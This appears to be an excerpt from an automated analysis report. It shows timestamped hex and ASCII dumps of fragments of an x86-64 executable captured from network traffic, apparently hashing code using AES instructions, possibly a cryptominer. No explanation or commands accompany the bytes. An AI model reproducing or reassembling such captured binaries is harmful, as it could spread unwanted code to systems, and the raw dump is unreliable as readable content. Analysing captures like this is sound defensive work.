                                                                                                                                                                                                                    Data Ascii: $LL$I[$LL$bI:$LL$I$LL$ILHT$`o$L$\$`'&ILHT$`o$L$\$`IH$LL$<.IH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4465INData Raw: f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 08 49 39 cd 0f 84 00 01 00 00 0f be 4c 1a 08 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 09 49 39 cd 0f 84 d9 00 00 00 0f be 4c 1a 09 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 0a 49 39 cd 0f 84 b2 00 00 00 0f be 4c 1a 0a 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 0b 49 39 cd 0f 84 8b 00 00 00 0f be 4c 1a 0b 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 0c 49 39 cd 74 68 0f be 4c 1a 0c 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 0d 49 39 cd 74 45 0f be 4c 1a 0d 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 c1 0f b6 c9 48 01 c8 48 8d 4a 0e 49 39 cd 74 22 0f be 54 1a 0e 81
                                                                                                                                                                                                                    Data Ascii: HHJI9LHHJI9LHHJI9LHHJI9LHHJI9thLHHJI9tELHHJI9t"T
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4481INData Raw: c2 f5 28 48 8b 48 18 4c 01 c3 49 89 da 48 83 f9 63 76 4d 0f 1f 84 00 00 00 00 00 48 89 ca 49 89 cd 49 83 ea 02 48 c1 ea 02 48 89 d0 49 f7 e3 48 89 d0 48 83 e2 fc 48 c1 e8 02 48 01 c2 48 8d 14 92 48 c1 e2 02 49 29 d5 43 0f b7 14 6c 66 41 89 12 48 89 ca 48 89 c1 48 81 fa 0f 27 00 00 77 bb 48 83 f9 09 0f 86 21 01 00 00 48 8d 05 da f9 1a 00 0f b7 04 48 66 41 89 42 fe 49 8d 46 20 4d 89 c7 4c 8d 25 93 e5 fe ff 48 89 44 24 38 8b 44 24 34 85 c0 7f 22 e9 31 01 00 00 90 49 8b 4e 08 49 89 56 10 41 0f b6 17 49 83 c7 01 88 14 01 4c 39 fb 0f 84 14 01 00 00 49 8b 46 10 49 8b 4e 18 48 8d 50 01 48 39 ca 76 d3 49 8b 06 48 8b 00 4c 39 e0 0f 85 d4 00 00 00 48 89 cd 4d 8b 6e 08 48 d1 ed 48 01 cd 48 39 d5 48 0f 42 ea 48 85 ed 0f 88 17 01 00 00 48 89 e9 e8 cf af 19 00 4d 8b 46
                                                                                                                                                                                                                    Data Ascii: (HHLIHcvMHIIHHIHHHHHHI)ClfAHHH'wH!HHfABIF ML%HD$8D$4"1INIVAIL9IFINHPH9vIHL9HMnHHH9HBHHMF
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4497INData Raw: 89 cc 48 39 d0 75 14 e8 7f 66 bf ff 4c 89 e1 48 83 c4 20 41 5c e9 61 70 19 00 90 48 83 c4 20 41 5c 48 ff e0 90 90 90 90 90 90 90 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 41 55 41 54 53 48 83 ec 20 48 8b 01 48 8b 80 c0 00 00 00 49 89 d5 48 8d 15 03 64 bf ff 49 89 cc 48 39 d0 0f 85 f7 01 00 00 41 8b 45 00 49 8d 55 20 48 8d 89 c0 02 00 00 89 41 e0 41 0f b6 45 04 88 41 e4 41 8b 45 08 89 41 e8 41 8b 45 0c 89 41 ec 41 8b 45 10 89 41 f0 41 0f b7 45 18 66 89 41 f8 41 8b 45 1c 89 41 fc e8 b3 ee be ff 49 8d 55 30 49 8d 8c 24 d0 02 00 00 e8 a2 ee be ff 41 0f b7 45 40 49
                                                                                                                                                                                                                    Data Ascii: H9ufLH A\apH A\H111AUATSH HHIHdIH9AEIU HAAEAAEAAEAAEAAEfAAEAIU0I$AE@I
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4513INData Raw: fe ff ff 4c 8b 77 10 48 89 c5 4d 8b 2e 49 8b 55 08 48 8d 04 10 49 3b 45 00 0f 87 87 01 00 00 49 89 45 08 49 8d 4c 15 18 e9 58 fe ff ff 48 8b 54 24 30 49 89 d8 e8 09 52 fd ff 48 89 c1 48 8b 84 24 d8 00 00 00 48 8b 40 08 48 89 44 24 38 48 8b 84 24 d8 00 00 00 8b 00 48 c1 e0 05 48 89 44 24 40 e9 1f fe ff ff 48 8b 33 49 39 f5 49 0f 43 f5 48 83 7b 08 00 0f 84 7c 01 00 00 49 89 f1 4c 89 44 24 20 31 c9 49 83 c1 18 0f 84 aa fc ff ff 4c 89 c9 e8 94 51 fd ff 48 89 c2 48 89 c1 48 85 c0 0f 84 93 fc ff ff 4c 8b 44 24 20 48 89 30 b9 18 00 00 00 4c 89 70 10 49 89 d6 48 c7 40 08 00 00 00 00 49 89 00 4c 89 e8 e9 5c fc ff ff 48 8b 07 49 39 c6 49 0f 43 c6 48 83 7f 08 00 49 89 c5 0f 84 80 01 00 00 4c 89 e9 4c 89 44 24 20 48 83 c1 18 0f 84 67 01 00 00 e8 2f 51 fd ff 48 89 c2
                                                                                                                                                                                                                    Data Ascii: LwHM.IUHI;EIEILXHT$0IRHH$H@HD$8H$HHD$@H3I9ICH{|ILD$ 1ILQHHHLD$ H0LpIH@IL\HI9ICHILLD$ Hg/QH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4529INData Raw: e7 da 2e 00 48 8b 8c 24 d0 00 00 00 48 83 c0 10 48 89 84 24 68 02 00 00 e8 4e ad 14 00 48 8b 84 24 a8 00 00 00 48 8b 9c 24 b0 00 00 00 48 8b 8c 24 c0 00 00 00 48 8b 40 e8 48 89 9c 04 50 02 00 00 48 8b 84 24 98 00 00 00 48 8b 9c 24 a0 00 00 00 48 89 84 24 60 02 00 00 48 8b 40 e8 48 89 9c 04 60 02 00 00 48 8b 84 24 88 00 00 00 48 8b 9c 24 90 00 00 00 48 89 84 24 50 02 00 00 48 8b 40 e8 48 89 9c 04 50 02 00 00 48 8b 05 ab dc 2e 00 48 c7 84 24 58 02 00 00 00 00 00 00 48 83 c0 10 48 89 84 24 d0 02 00 00 e8 6e 25 18 00 48 8b 84 24 70 07 00 00 0f 10 b4 24 00 07 00 00 0f 10 bc 24 10 07 00 00 48 81 c4 28 07 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 90 83 44 24 40 01 8b 44 24 40 83 f8 12 0f 85 56 e7 ff ff e9 31 f5 ff ff 66 0f 1f 84 00 00 00 00 00 f3 0f 6f 50
                                                                                                                                                                                                                    Data Ascii: .H$HH$hNH$H$H$H@HPH$H$H$`H@H`H$H$H$PH@HPH.H$XHH$n%H$p$$H([^_]A\A]A^A_fD$@D$@V1foP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4545INData Raw: 78 48 8b bb 80 00 00 00 48 ba db 34 b6 d7 82 de 1b 43 48 89 c1 48 f7 ea 48 c1 f9 3f 48 c1 fa 12 48 29 ca 48 89 54 24 68 48 39 f7 0f 84 8a 05 00 00 48 8d 84 24 88 00 00 00 4c 8b 6b 68 4c 8d 7b 60 48 89 44 24 58 48 8d 84 24 20 01 00 00 48 8d 2d 06 06 00 00 48 89 44 24 60 4c 8d 25 8a 50 2f 00 e9 82 00 00 00 0f 1f 44 00 00 49 c7 45 00 00 00 00 00 b9 20 00 00 00 e8 4e b0 18 00 0f b6 8c 24 20 01 00 00 4c 8d 8c 24 90 00 00 00 45 31 c0 4c 89 20 4c 89 ca 88 48 08 0f b6 8c 24 18 01 00 00 44 89 70 0c 88 48 09 4c 89 e9 48 89 58 10 48 89 68 18 48 89 84 24 90 00 00 00 e8 4b 72 14 00 48 8b 8c 24 90 00 00 00 48 85 c9 74 06 48 8b 01 ff 50 08 48 8b 43 68 48 83 c6 04 4c 8d 68 08 4c 89 6b 68 48 39 f7 74 61 44 8b 36 48 89 9c 24 88 00 00 00 44 89 b4 24 84 00 00 00 4c 39 6b 70
                                                                                                                                                                                                                    Data Ascii: xHH4CHHH?HH)HT$hH9H$LkhL{`HD$XH$ H-HD$`L%P/DIE N$ L$E1L LH$DpHLHXHhH$KrH$HtHPHChHLhLkhH9taD6H$D$L9kp
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4561INData Raw: 4c 0f 6e c2 66 48 0f 7e e8 48 f7 e6 48 83 6c 24 50 01 44 0f 16 44 24 28 66 41 0f d4 c8 48 89 44 24 20 66 44 0f 6f c1 66 45 0f ef c6 45 0f 11 02 66 4c 0f 6e c3 66 45 0f 6c c7 66 41 0f ef c8 66 4c 0f 6e c2 44 0f 16 44 24 20 66 49 0f 7e ca 66 41 0f d4 c0 f3 44 0f 6f 44 24 40 66 44 0f ef c0 45 0f 11 00 66 4c 0f 6e c6 66 45 0f 6c c2 66 41 0f ef c0 66 48 0f 7e c0 0f 85 6d fd ff ff 48 8b 7c 24 58 80 3d 81 16 37 00 00 48 8b 0f 0f 84 12 01 00 00 48 8b 57 08 41 b9 01 00 00 00 41 b8 00 00 04 00 e8 f3 cc ca ff 48 8b 57 18 48 8b 4f 10 41 b9 01 00 00 00 41 b8 00 00 04 00 e8 da cc ca ff 48 8b 5c 24 60 48 8b 6c 24 68 48 8d 35 79 11 20 00 48 8d bb 80 00 00 00 48 8b 4d 00 ba 18 00 00 00 48 83 c5 08 e8 c0 75 b9 ff 48 8b 4d f8 49 89 d8 48 83 c3 20 ba c8 00 00 00 0f b6 01 83
                                                                                                                                                                                                                    Data Ascii: LnfH~HHl$PDD$(fAHD$ fDofEEfLnfElfAfLnDD$ fI~fADoD$@fDEfLnfElfAfH~mH|$X=7HHWAAHWHOAAH\$`Hl$hH5y HHMHuHMIH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4577INData Raw: e1 44 0f b6 e8 66 0f 7e a4 24 30 01 00 00 c1 e9 10 44 0f b6 d9 48 8d 0d 4f d7 1f 00 8b 14 91 42 33 54 9d 00 4c 8d 99 00 fc ff ff 41 33 14 b3 44 8b 5c 24 30 0f b6 f4 89 f6 41 c1 eb 10 8b 34 b1 45 0f b6 db 42 33 74 9d 00 4c 8d 99 00 fc ff ff 8b 4c 24 30 4c 89 d8 43 33 34 a3 45 89 c4 0f b6 cd 41 c1 ec 10 41 89 cb 48 8d 88 00 04 00 00 45 0f b6 e4 46 8b 1c 99 44 89 c1 46 33 5c a5 00 41 c1 e8 18 0f b6 cd 46 33 1c a8 41 89 dd 41 81 c0 00 01 00 00 41 c1 ed 10 41 89 cc 48 8d 88 00 04 00 00 c1 eb 18 46 8b 24 a1 48 8b 8c 24 38 01 00 00 45 0f b6 ed 81 c3 00 01 00 00 46 33 64 ad 00 44 33 24 88 8b 44 24 30 c1 e8 18 05 00 01 00 00 33 54 85 00 42 33 74 85 00 66 41 0f 7e d0 8b 84 24 30 01 00 00 44 33 5c 9d 00 66 0f 6e ee 66 41 0f 6e e3 48 8b 5c 24 28 45 0f b6 d8 c1 e8 18
                                                                                                                                                                                                                    Data Ascii: Df~$0DHOB3TLA3D\$0A4EB3tLL$0LC34EAAHEFDF3\AF3AAAAHF$H$8EF3dD3$D$03TB3tfA~$0D3\fnfAnH\$(E
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4593INData Raw: ff 48 8b 84 24 58 01 00 00 48 8b 48 10 e8 29 7e c9 ff 48 8b 84 24 58 01 00 00 48 8b 48 18 e8 18 7e c9 ff 48 8b b4 24 50 01 00 00 48 8b 9c 24 58 01 00 00 48 8d ae 80 00 00 00 48 8b 0b ba 18 00 00 00 48 83 c3 08 e8 60 f6 b8 ff 48 8b 4b f8 49 89 f0 48 83 c6 20 ba c8 00 00 00 0f b6 01 83 e0 03 ff 14 c7 48 39 f5 75 d1 0f 10 74 24 70 0f 10 bc 24 80 00 00 00 44 0f 10 84 24 90 00 00 00 44 0f 10 8c 24 a0 00 00 00 44 0f 10 94 24 b0 00 00 00 44 0f 10 9c 24 c0 00 00 00 44 0f 10 a4 24 d0 00 00 00 44 0f 10 ac 24 e0 00 00 00 48 81 c4 f8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 90 90 90 90 90 90 90 90 90 90 90 41 57 41 56 41 55 41 54 55 57 56 53 48 81 ec 08 01 00 00 0f 11 74 24 60 0f 11 7c 24 70 44 0f 11 84 24 80 00 00 00 44 0f 11 8c 24 90 00 00 00 44 0f 11 94 24
                                                                                                                                                                                                                    Data Ascii: H$XHH)~H$XHH~H$PH$XHHH`HKIH H9ut$p$D$D$D$D$D$D$H[^_]A\A]A^A_AWAVAUATUWVSHt$`|$pD$D$D$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4609INData Raw: 89 f6 41 c1 e9 18 45 0f b6 d2 41 81 c1 00 01 00 00 46 8b 14 91 45 33 14 b7 89 de c1 eb 18 45 33 14 be 0f b6 fc 66 0f 7e d0 c1 ee 10 c1 e8 18 81 c3 00 01 00 00 89 ff 40 0f b6 f6 05 00 01 00 00 46 33 1c 89 8b 34 b1 66 41 0f 7e c9 44 33 04 81 44 33 14 99 41 33 34 bf 41 33 34 ae 66 45 0f 6e f2 33 34 91 66 41 0f 6e d0 66 0f 6e f6 66 44 0f 62 f6 66 41 0f 6e f3 45 0f b6 d9 66 0f 62 d6 66 41 0f 6c d6 66 45 0f 6f f4 66 44 0f 6f e2 66 0f 70 d1 55 66 0f 7e d3 66 0f 6f d1 66 45 0f ef e0 66 0f 6a d1 0f b6 c7 66 0f 70 c9 ff 0f b6 f3 66 41 0f 7e d0 41 89 c2 66 0f 7e c8 41 c1 e8 10 66 0f 7e d2 c1 e8 10 66 45 0f ef f4 45 0f b6 c0 45 0f 11 34 24 0f b6 fa 66 41 0f 7e cc 46 8b 04 81 47 33 04 97 41 0f b6 ec 47 33 04 9e 44 0f b6 d8 0f b6 c6 41 89 c2 46 8b 1c 99 66 0f 7e c8 47
                                                                                                                                                                                                                    Data Ascii: AEAFE3E3f~@F34fA~D3D3A34A34fEn34fAnfnfDbfAnEfbfAlfEofDofpUf~fofEfjfpfA~Af~Af~fEEE4$fA~FG3AG3DAFf~G
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4625INData Raw: 01 00 00 48 8b 48 18 e8 8f 06 c9 ff 48 8b 84 24 88 01 00 00 66 0f ef c0 66 44 0f 6f f8 66 44 0f 6f f0 66 44 0f 6f e8 4c 8b 00 49 8b 80 e0 00 00 00 4d 8b 08 4d 33 48 20 48 89 44 24 20 48 8b 84 24 88 01 00 00 4d 89 cc 4d 8b 48 08 4d 33 48 28 66 4d 0f 6e c4 48 8b 48 08 66 49 0f 6e e9 4d 8b 48 10 4d 33 48 30 66 44 0f 6c c5 48 8b 81 e0 00 00 00 66 4d 0f 6e e1 4d 8b 48 18 4d 33 48 38 48 89 44 24 28 48 8b 84 24 88 01 00 00 66 49 0f 6e f1 4c 8b 09 4c 33 49 20 66 44 0f 6c e6 48 8b 50 10 4c 89 cd 4c 8b 49 08 4c 33 49 28 66 48 0f 6e fd 48 8b 82 e0 00 00 00 66 49 0f 6e e9 4c 8b 49 10 4c 33 49 30 66 0f 6c fd 48 89 44 24 30 48 8b 84 24 88 01 00 00 66 4d 0f 6e d9 4c 8b 49 18 4c 33 49 38 48 8b 40 18 66 49 0f 6e f1 66 44 0f 6c de 48 8b b8 e0 00 00 00 48 89 7c 24 38 4c 8b
                                                                                                                                                                                                                    Data Ascii: HHH$ffDofDofDoLIMM3H HD$ H$MMHM3H(fMnHHfInMHM3H0fDlHfMnMHM3H8HD$(H$fInLL3I fDlHPLLIL3I(fHnHfInLIL3I0flHD$0H$fMnLIL3I8H@fInfDlHH|$8L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4641INData Raw: 24 66 2e 0f 1f 84 00 00 00 00 00 44 0f 11 6c 24 40 66 45 0f 6f e6 66 41 0f 6f e3 66 44 0f 6f eb 0f 11 5c 24 20 4c 89 fa 48 8b 84 24 f0 00 00 00 81 e3 f0 ff 1f 00 81 e6 f0 ff 1f 00 81 e2 f0 ff 1f 00 49 8d 3c 1c 4c 8d 4c 35 00 49 89 d0 48 89 d1 4d 8d 54 15 00 48 83 f2 30 49 83 f0 10 48 83 f1 20 4c 01 ea f3 45 0f 6f 32 4d 01 e8 4c 01 e9 f3 0f 6f 1a 25 f0 ff 1f 00 f3 41 0f 6f 10 f3 0f 6f 01 4d 8d 1c 06 66 44 0f 38 dc f7 66 41 0f d4 d8 f3 45 0f 6f 1b f3 44 0f 6f 0f 66 0f d4 c7 66 41 0f d4 d4 f3 41 0f 6f 29 41 0f 11 18 0f 11 11 48 89 c1 66 41 0f 6f db 66 45 0f 38 dc cf 0f 11 02 48 89 c2 48 83 f1 10 48 83 f0 30 48 83 f2 20 66 41 0f 6f c6 4c 01 f1 4c 01 f0 4c 01 f2 66 41 0f ef c4 66 0f 38 dc de 41 0f 11 02 f3 0f 6f 11 f3 0f 6f 02 66 41 0f 38 dc ea f3 44 0f 6f 18
                                                                                                                                                                                                                    Data Ascii: $f.Dl$@fEofAofDo\$ LH$I<LL5IHMTH0IH LEo2MLo%AooMfD8fAEoDoffAAo)AHfAofE8HHH0H fAoLLLfAf8AoofA8Do
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4657INData Raw: 48 0f 6e f1 48 89 d1 66 49 0f 6e d8 48 89 94 24 10 02 00 00 48 c1 e9 20 89 84 24 a8 00 00 00 66 0f 6c de 48 8b 94 24 80 23 00 00 48 89 8c 24 b0 00 00 00 48 89 c1 48 c1 e9 20 48 89 84 24 18 02 00 00 48 8d 84 24 70 12 00 00 48 89 8c 24 a0 00 00 00 48 89 c1 0f 11 5c 24 40 48 89 84 24 a8 01 00 00 e8 c4 34 c7 ff 48 8b 07 48 33 47 20 48 89 c6 48 8b 47 08 48 33 47 28 66 48 0f 6e d8 48 8b 47 10 48 33 47 30 66 48 0f 6e f6 49 89 c0 48 8b 47 18 48 33 47 38 66 0f 6c f3 48 8b 4f 60 66 48 0f 6e d8 48 8b 47 40 66 4d 0f 6e f0 48 33 47 50 48 8b 57 68 66 44 0f 6c f3 49 89 c0 48 8b 47 48 48 33 47 58 89 8c 24 c4 00 00 00 66 48 0f 6e c0 48 89 c8 66 49 0f 6e d8 89 94 24 c0 00 00 00 48 c1 e8 20 48 89 94 24 48 02 00 00 66 0f 6c d8 48 89 84 24 c8 00 00 00 48 89 d0 48 8b 94 24 80
                                                                                                                                                                                                                    Data Ascii: HnHfInH$H $flH$#H$HH H$H$pH$H\$@H$4HH3G HHGH3G(fHnHGH3G0fHnIHGH3G8flHO`fHnHG@fMnH3GPHWhfDlIHGHH3GX$fHnHfIn$H H$HflH$HH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4673INData Raw: 6e e2 f3 41 0f 6f 2a 49 8b 72 08 49 89 d0 0f 16 64 24 58 66 41 0f ef 23 66 0f d4 64 24 60 44 0f 11 5c 24 60 4d 33 02 66 41 0f d4 ef 66 45 0f d4 cb 48 31 c6 41 0f 11 23 66 49 0f 6e e0 48 8b 84 24 38 01 00 00 45 0f 11 0a 48 83 ac 24 68 01 00 00 01 0f 11 2b 66 48 0f 6e ee 66 0f 6c e5 66 48 0f 6e e9 66 41 0f d4 e7 0f 16 ac 24 48 01 00 00 66 0f ef ec 0f 11 20 66 44 0f 6f fd 66 49 0f 7e e8 0f 85 84 f2 ff ff 48 8b 84 24 88 02 00 00 48 8d 3d b5 51 1e 00 48 8b 08 e8 2d 4c c8 ff 48 8b 84 24 88 02 00 00 48 8b 48 08 e8 1c 4c c8 ff 48 8b 84 24 88 02 00 00 48 8b 48 10 e8 0b 4c c8 ff 48 8b 84 24 88 02 00 00 48 8b 48 18 e8 fa 4b c8 ff 48 8b b4 24 80 02 00 00 48 8b 9c 24 88 02 00 00 48 8d ae 80 00 00 00 48 8b 0b ba 18 00 00 00 48 83 c3 08 e8 b2 b5 b7 ff 48 8b 4b f8 49 89
                                                                                                                                                                                                                    Data Ascii: nAo*IrId$XfA#fd$`D\$`M3fAfEH1A#fInH$8EH$h+fHnflfHnfA$Hf fDofI~H$H=QH-LH$HHLH$HHLH$HHKH$H$HHHHKI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4689INData Raw: 89 1b 48 89 44 24 40 66 48 0f 6e e2 0f 16 64 24 40 66 0f d4 c4 66 48 0f 6e e7 66 0f 6c e5 41 0f 11 01 66 0f ef c4 66 49 0f 7e c3 41 81 e3 f0 ff 3f 00 4c 03 5c 24 30 45 8b 4b 08 49 8b 1b 44 89 ce 48 89 d8 41 f7 d1 83 ce 05 48 99 4d 63 c9 48 63 f6 48 f7 fe 48 31 c3 4c 31 c8 48 83 6c 24 60 01 49 89 1b 0f 85 11 f9 ff ff 48 8b 4c 24 68 48 8d 3d d5 11 1e 00 e8 f0 1d c8 ff 48 8b 84 24 58 01 00 00 48 8b 48 08 e8 df 1d c8 ff 48 8b 84 24 58 01 00 00 48 8b 48 10 e8 ce 1d c8 ff 48 8b 84 24 58 01 00 00 48 8b 48 18 e8 bd 1d c8 ff 48 8b b4 24 50 01 00 00 48 8b 9c 24 58 01 00 00 48 8d ae 80 00 00 00 48 8b 0b ba 18 00 00 00 48 83 c3 08 e8 d5 75 b7 ff 48 8b 4b f8 49 89 f0 48 83 c6 20 ba c8 00 00 00 0f b6 01 83 e0 03 ff 14 c7 48 39 f5 75 d1 0f 10 74 24 70 0f 10 bc 24 80 00
                                                                                                                                                                                                                    Data Ascii: HD$@fHnd$@ffHnflAffI~A?L\$0EKIDHAHMcHcHH1L1Hl$`IHL$hH=H$XHHH$XHHH$XHHH$PH$XHHHuHKIH H9ut$p$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4705INData Raw: 66 0f 73 dc 08 66 49 0f 7e f7 66 48 0f 7e e0 48 f7 f3 48 bb 01 00 00 00 02 fc ff ff 48 c1 e2 20 89 c0 48 01 c2 66 48 0f 6e ea 4c 01 da 48 89 d5 0f 11 ac 24 f0 00 00 00 66 41 0f 28 ea 48 c1 ed 0c 66 48 0f 6e e5 66 0f d4 25 1d e3 1d 00 f2 0f 51 ec 66 48 0f 7e e8 66 48 0f 7e ed 48 c1 ed 14 48 c1 e8 13 48 01 c3 48 89 ee 4c 01 ce 48 29 eb 48 8b 6c 24 48 48 0f af de 48 29 d3 48 89 5d 00 bb 00 00 00 00 48 11 d8 48 8b 5c 24 40 66 48 0f 6e e8 48 89 03 66 48 0f 7e d8 4c 89 d3 4c 8b 64 24 28 48 f7 e1 48 83 f3 10 0f 11 ac 24 40 01 00 00 48 89 de 4c 89 d3 49 83 f2 30 4c 01 e6 48 83 f3 20 4d 01 e2 66 48 0f 6e e2 4c 01 e3 f3 41 0f 6f 3a 49 89 d3 f3 0f 6f 2b 48 8b 6b 08 48 89 84 24 c0 00 00 00 49 bc 01 00 00 00 02 fc ff ff 4c 33 1b 48 31 c5 66 41 0f d4 ec 0f 16 a4 24 c0
                                                                                                                                                                                                                    Data Ascii: fsfI~fH~HHH HfHnLH$fA(HfHnf%QfH~fH~HHHHLH)Hl$HHH)H]HH\$@fHnHfH~LLd$(HH$@HLI0LH MfHnLAo:Io+HkH$IL3H1fA$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4721INData Raw: b9 c8 00 00 00 44 89 e2 48 83 c3 08 48 01 ef e8 17 fd b6 ff 48 8b 4b f8 c6 81 b0 01 00 00 01 e8 87 67 c7 ff 49 39 dd 75 d0 4c 8b 0e 4c 8b 46 08 66 45 0f ef c9 4c 8d 35 2f 93 1d 00 48 8b 4e 10 48 8b 56 18 49 8d ae 00 04 00 00 f3 41 0f 7e 79 60 4d 8b 51 08 4c 8d ad 00 04 00 00 49 8b 81 e0 00 00 00 4d 33 51 28 0f 11 bc 24 e0 00 00 00 f3 41 0f 7e 79 68 4d 8b 39 48 89 44 24 20 49 8b 80 e0 00 00 00 4d 33 79 20 0f 11 bc 24 30 01 00 00 66 49 0f 6e fa 4d 8b 51 10 48 89 44 24 28 4d 33 51 30 66 49 0f 6e f7 48 8b 81 e0 00 00 00 4d 89 d3 4d 8b 51 18 66 0f 6c f7 4d 33 51 38 66 49 0f 6e fb 48 89 44 24 30 48 8b 82 e0 00 00 00 66 49 0f 6e c2 4d 8b 51 40 4d 33 51 50 66 0f 6c f8 48 89 44 24 78 48 8b 46 20 4d 89 d3 4d 8b 51 48 4d 33 51 58 66 4d 0f 6e f3 0f 11 7c 24 50 48 8b
                                                                                                                                                                                                                    Data Ascii: DHHHKgI9uLLFfEL5/HNHVIA~y`MQLIM3Q($A~yhM9HD$ IM3y $0fInMQHD$(M3Q0fInHMMQflM3Q8fInHD$0HfInMQ@M3QPflHD$xHF MMQHM3QXfMn|$PH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4737INData Raw: 80 00 00 00 0f 1f 80 00 00 00 00 81 e1 f0 ff 07 00 66 44 0f 6f d5 4c 8b 9c 24 a0 00 00 00 48 8b 74 24 48 4c 8b a4 24 b0 00 00 00 81 e7 f0 ff 07 00 81 e3 f0 ff 07 00 41 81 e2 f0 ff 07 00 4c 01 d9 81 e2 f0 ff 07 00 48 01 f7 4c 01 f3 f3 0f 6f 29 4c 01 e2 4d 01 fa f3 44 0f 6f 37 f3 44 0f 6f 2b f3 45 0f 6f 22 66 0f 38 dc ec f3 44 0f 6f 1a 66 44 0f ef d5 66 44 0f d6 11 45 0f 12 d2 66 44 0f 7e d0 66 4d 0f 7e d0 66 45 0f 6f d1 c1 e8 18 66 45 0f 6f ce 41 8b 44 85 00 66 44 0f 38 dc cb 66 45 0f ef d1 4c 31 c0 48 89 41 08 66 44 0f d6 17 45 0f 12 d2 66 44 0f 7e d1 66 4c 0f 7e d0 66 45 0f 6f d0 c1 e9 18 66 45 0f 6f c5 41 8b 4c 8d 00 66 44 0f 38 dc c2 66 45 0f ef d0 48 31 c8 48 89 47 08 66 4c 0f 7e cf 66 44 0f d6 13 45 0f 12 d2 81 e7 f0 ff 07 00 66 44 0f 7e d1 66 4c 0f
                                                                                                                                                                                                                    Data Ascii: fDoL$Ht$HL$ALHLo)LMDo7Do+Eo"f8DofDfDEfD~fM~fEofEoADfD8fEL1HAfDEfD~fL~fEofEoALfD8fEH1HGfL~fDEfD~fL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4753INData Raw: b2 00 08 00 00 66 0f 6c f7 66 48 0f 6e fa 0f 11 b4 24 80 00 00 00 66 0f 6f f5 66 0f 6c f7 0f 11 b4 24 90 00 00 00 49 8b 44 04 23 66 0f 6f f5 49 33 87 c0 00 00 00 66 48 0f 6e f8 49 8b 44 9c 23 49 33 81 c0 00 00 00 48 c7 84 24 c0 00 00 00 00 00 04 00 66 0f 6c f7 4d 8d ba 00 04 00 00 49 89 ec 0f 11 b4 24 a0 00 00 00 66 0f 6f f5 66 48 0f 6e e8 66 0f 6c f5 0f 11 b4 24 b0 00 00 00 0f 1f 44 00 00 4c 89 e5 48 8b 44 24 38 41 81 e0 f0 ff 0f 00 81 e6 f0 ff 0f 00 81 e5 f0 ff 0f 00 48 03 6c 24 40 48 03 74 24 28 81 e7 f0 ff 0f 00 f3 44 0f 6f 75 00 4e 8d 2c 00 f3 0f 6f 3e 48 89 74 24 58 48 03 7c 24 20 41 81 e3 f0 ff 0f 00 4c 03 5c 24 30 66 45 0f 70 fe 55 66 44 0f 7e f3 f3 44 0f 6f 07 48 89 7c 24 50 66 44 0f 7e f9 66 45 0f 6f fe 0f b6 fb f3 41 0f 6f 33 66 45 0f 6a fe 0f
                                                                                                                                                                                                                    Data Ascii: flfHn$fofl$ID#foI3fHnID#I3H$flMI$fofHnfl$DLHD$8AHl$@Ht$(DouN,o>Ht$XH|$ AL\$0fEpUfD~DoH|$PfD~fEoAo3fEj
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC4769INData Raw: 0f b6 fa 0f b6 e8 47 8b 04 86 47 33 04 8f 41 89 f1 0f b6 f4 c1 ea 18 47 33 04 94 66 41 0f 7e c2 c1 e8 18 41 c1 ea 10 05 00 01 00 00 81 c2 00 01 00 00 45 0f b6 d2 45 33 04 86 66 4c 0f 7e e0 47 8b 14 96 47 33 14 8f 41 89 d9 66 41 0f 6e c0 41 c1 e9 10 47 33 14 9c 41 89 f3 45 0f b6 c9 47 8b 0c 8e 47 33 0c 9f 41 89 cb c1 e9 18 45 33 0c bc 41 c1 eb 10 0f b6 ff 81 c1 00 01 00 00 c1 eb 18 89 ff 45 0f b6 db 45 33 0c 8e 81 c3 00 01 00 00 47 8b 1c 9e 45 33 1c bf 66 41 0f 6e c9 45 33 14 9e 45 33 1c ac 66 4c 0f 7e df 45 33 1c 96 66 4d 0f 7e e4 81 e7 f0 ff 1f 00 48 03 bc 24 b8 00 00 00 66 41 0f 6e fb 41 81 e4 f0 ff 1f 00 66 4d 0f 7e c9 4c 03 a4 24 b0 00 00 00 66 0f 62 cf 66 41 0f 6e fa 41 81 e1 f0 ff 1f 00 66 0f 62 c7 66 0f 6c c1 66 0f ef 44 24 30 f3 0f 6f 8c 24 80 00
